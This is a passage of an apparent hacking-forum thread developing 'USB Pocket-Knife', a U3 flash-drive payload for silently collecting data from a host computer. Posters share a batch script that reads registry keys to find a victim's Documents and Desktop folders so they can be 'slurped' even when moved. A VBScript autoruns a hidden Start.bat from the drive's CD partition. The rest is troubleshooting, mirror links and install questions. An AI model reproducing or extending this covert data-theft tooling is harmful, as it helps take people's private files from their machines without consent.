USB Pocket-Knife Development

Leapo

Meanwhile Leapo is working, let's try going further! ;)

Because of my maniatical obsession of making this payload (and any other) to run in any language installation :rolleyes: , I have done a batch that assigns variables to some paths. Besides, the batch can clean and improve on some variables from the original Leapo's payload that woudn't work in next cases: :(

1. The user is very "smart" and he thought: If I change my by-default systems paths, they won't be able to slurp any of my information!!!
  2. The system language we want to slurp from is some other, for example: Chinese or Spanish (1st and 2nd languages spoken in the world...), of course English too!
The script basically gets some registy value keys and assign variables for the next paths (even if they have been modified): ;)

• MyD for Current User "My Documents" path
  • Dsk for Current User "Desktop" path
  • ShMyD for Shared "My Documents" for All Users path
  • ShDoc for Shared "Desktop" for All Users path
Leapo: if you are interested in integrating it in your payload, I think It'll be a good way to standarize the payload. Anyway, is useful in Slurp2 and Slurp3. If you want, I can modify your payload with this stuff and the other posted by me before and post the final code :unsure: .

It can be useful too for slurping non-by-default installation paths for any program by exporting KeyReg values, consulting them and setting the correct variables up.

Tested in Windows 2000 and Windows XP, English and Spanish versions.

The script takes about a second or less in assigning the variables. <_<

@echo off
:: Paths Finder
:: By DMilton for free community
:: Thread http://hak5.org/forums/index.php?showtopic=6746
:: This batch writes variables for using sure paths for My Document, Desktop, My Shared Documents and My Shared Desktop

:: Creating a set of variables for temp data
set ActualUser=".\ActualUser.dat"
set Common=".\Common.dat"
set TmpReg=".\tmpval.dat"
set /A ValCounter=1

::Erases temporal files if needed
if exist %ActualUser% del /S /F /Q /A:- %ActualUser%
if exist %Common% del /S /F /Q /A:- %Common%
if exist %TmpReg% del /s /F /Q /A:- %TmpReg%

:: Exporting keys
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %Common%
REG EXPORT "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %ActualUser%
if not %errorlevel%==0 goto error

:: Creating a temp file containing the desired data
type %ActualUser% | find "Personal" &gt;&gt; %TmpReg%
type %ActualUser% | find "Desktop" &gt;&gt; %TmpReg%
type %Common% | find "Common Documents"&gt;&gt; %TmpReg%
type %Common% | find "Common Desktop"&gt;&gt; %TmpReg%

:: Extracts the necessary lines from tmpval.dat for a fruther cleaning
FOR /F "tokens=2* delims==" %%I IN (.\tmpval.dat) DO set var="%%I"
if "%var%"=="" goto error
FOR /F "tokens=2* delims==" %%I IN (.\tmpval.dat) DO (
call:FOUND %%I
)

:: Deleting temporal files
del /S /F /Q /A:- %ActualUser%
del /S /F /Q /A:- %Common%
del /S /F /Q /A:- %TmpReg%
goto :CONTINUE
:FOUND
:: Cleaning of the path and setting temp ReyKey variable
SET PP="%~1"
SET PP=%PP:\\=\%
SET PP=%PP:"=%
SET RegKey=%PP%

:: Assigning variables using ValCounting (counter) and RegKey
IF %ValCounter%==1 SET MyD=%RegKey%
IF %ValCounter%==2 SET Dsk=%RegKey%
IF %ValCounter%==3 SET ShDoc=%RegKey%
IF %ValCounter%==4 SET ShDsk=%RegKey%
set /A ValCounter=ValCounter+1

:error
:: Error???? This stuff goes perfectly!!
GOTO :EOF

:CONTINUE
:: Here you can do what you want with the MyD, Dsk, ShDoc and ShDsk variables

I hope it helps!

I'll integrate the same almost for MSN Messenger paths in next days.

Any comments? If someone want's a proof of concept, I'll be glad of doing it. :lol:

• Replies 818
  • Created
  • Last Reply

Top Posters In This Topic

Top Posters In This Topic

Posted Images

Megaupload and Rapidshare have both been very slow when I download this. The last time it took close to no time to download at all, whereas this time, it stops at around 15% and eventually the connection resets. Anyone else getting this? Anyone else have any other mirrors to try?

i get too this also im on a wireless connection

2 DMilton, thanks for your great additions. Pocketknife for win!

I think if you have something usefull, you must to share it. Is the best way for learning... ;)

i'll try to dl and reupload to a mirror later when i come back. I have a rs premium acct

It'll be a good help.... :lol:

Sorry forgot to post yesterday

GO.VBS

Set objFSO = CreateObject("Scripting.FileSystemObject") 
Set objShell = CreateObject("Wscript.Shell")
Set colDrives = objFSO.Drives
Set objEnv = objShell.Environment("PROCESS")

objEnv("Year") = Year(now())
objEnv("Month") = Right("0" &amp; Month(now()), 2)
objEnv("Day") = Right("0" &amp; Day(now()), 2)
objEnv("Hour") = Right("0" &amp; Hour(now()), 2)
objEnv("Minute") = Right("0" &amp; Minute(now()), 2)
objEnv("Second") = Right("0" &amp; Second(now()), 2)

For Each objDrive in colDrives

strPath = objDrive.Driveletter &amp; ":"

If objDrive.DriveType = 4 Then
         If objFSO.FileExists(objDrive.DriveLetter &amp; ":\SYSTEM\Start.bat") Then
              objShell.Run objDrive.DriveLetter &amp; ":\SYSTEM\Start.bat " &amp; strPath , 0, False
              Exit For
         End If
    End If
Next

Will fix that error, it''ll only try and access a cd/dvd drive or in our case the u3 partition

That was a good implementation, only a little IF is all it was needed!. I vote for updatting the Payload!

MouseTech.org Mirror

PocketKnife_v0880.zip Mirrored off my site!!!

yea heres a mirror for you guys to use

no wait times no passwords no fucking bullshit :)

Fantastic, thanks a lot! :lol:

It's on a few pages back, but this is a summary. The drive detection counts back up, so from Z: to A:. In the middle, there are other drives before C: which are those multi-card readers. The no-drive error is because it detects those driev, but there's nothing in it, so it gives that error. Leapo is going to release a version with a better drive detection soon.

Yea i was having same errors but then i relized all u have to do if u dont want to see them (not that it changes much) but if u just dont wont to see them even tho thay dont restrict you from doing anything just click on saftly remove devices in the tray and eject the card reader you shouldent get that problem

GO.VBS

Set objFSO = CreateObject("Scripting.FileSystemObject") 
Set objShell = CreateObject("Wscript.Shell")
Set colDrives = objFSO.Drives
Set objEnv = objShell.Environment("PROCESS")

objEnv("Year") = Year(now())
objEnv("Month") = Right("0" &amp; Month(now()), 2)
objEnv("Day") = Right("0" &amp; Day(now()), 2)
objEnv("Hour") = Right("0" &amp; Hour(now()), 2)
objEnv("Minute") = Right("0" &amp; Minute(now()), 2)
objEnv("Second") = Right("0" &amp; Second(now()), 2)

For Each objDrive in colDrives

strPath = objDrive.Driveletter &amp; ":"

If objDrive.DriveType = 4 Then
         If objFSO.FileExists(objDrive.DriveLetter &amp; ":\SYSTEM\Start.bat") Then
              objShell.Run objDrive.DriveLetter &amp; ":\SYSTEM\Start.bat " &amp; strPath , 0, False
              Exit For
         End If
    End If
Next

Will fix that error, it''ll only try and access a cd/dvd drive or in our case the u3 partition

I tried this and still got the "No Disk" error. When the error popped up I left it there and took a look to see how far along the log file was.

It was hung up in "Network Services"

I turned the "Network Services" dump off and it ran silently (with everything else except slurp2 and the installers turned on)

I have no idea why It'd give the error there.

I tried this and still got the "No Disk" error. When the error popped up I left it there and took a look to see how far along the log file was.

It was hung up in "Network Services"

I have no idea why It'd give the error there.

Hmm, very odd indeed.

I actually found out with my machine it was down to the floppy drive (ergh). I found this by writing a script which went through the drives looking for a file. Infact I also found that my machine searched A-Z, not Z-A which was mentioned above.

What drives do you have? Maybe I can setup something to match?

I have a U3 flash drive. It is a SanDisk Cruzer Micro.

I was able to successfully download the Universal Customizer (or Universal Launchpad, or U3 Launchpad...apparently it has multiple names) and PocketKnife payload. I installed the Universal Customizer on my flash drive. However, I'm kind of stuck here.

The Universal Customizer Wiki doesn't seem to explain how to put PocketKnife on it.

I'm totally lost. I've looked through threads on this forum, the hak5 wiki, and another forum, and nothing seems to specifically say how you put the PocketKnife payload on a flash drive.

I don't need to be spoonfed; I just want some short instructions on how to move PocketKnife onto my USB flash drive so I can use it. I read the PocketKnife and Universal Customizer readmes, and I made a safety.txt file, and I looked through its menu batch file...but nothing seems to explain how I put the payload on my flash drive.

Does anyone have AIM, MSN, or Steam? If so, could they please talk to me over it?

Thanks.

I was able to successfully download the Universal Customizer (or Universal Launchpad, or U3 Launchpad...apparently it has multiple names) and PocketKnife payload. I installed the Universal Customizer on my flash drive. However, I'm kind of stuck here.

The Universal Customizer Wiki doesn't seem to explain how to put PocketKnife on it.

I'm totally lost. I've looked through threads on this forum, the hak5 wiki, and another forum, and nothing seems to specifically say how you put the PocketKnife payload on a flash drive.

I don't need to be spoonfed; I just want some short instructions on how to move PocketKnife onto my USB flash drive so I can use it. I read the PocketKnife and Universal Customizer readmes, and I made a safety.txt file, and I looked through its menu batch file...but nothing seems to explain how I put the payload on my flash drive.

Does anyone have AIM, MSN, or Steam? If so, could they please talk to me over it?

Thanks.

alex@normalms.com hit me up on MSN I'll walk you thourgh it.

Thanks.

Please keep your post in one topic, or do not start another one with the exact information in it.

For those, who need it: There is a installation procedure in this forum by me, and also a package including Leapos last version, U3-Customizer and an install.txt, how to install the stuff on the usb-stick. I have read, the whole package might be too big to download, so I will split this in two parts: 1st Package = (U3Ciustomizer + Gonzors menu + Install.txt) and 2nd Package = (Leapos-Payload + Install.txt) if you are interested in this at all.

And Install.bat will follow, but at the moment, my only Windows system (my notebook) is at repair and will not be sent back before 7.11.2008. So I could not test the installation routuine before. Sorry for that ( I am a linux guy), but for those, who can't wait: Check this forum for my installation hints.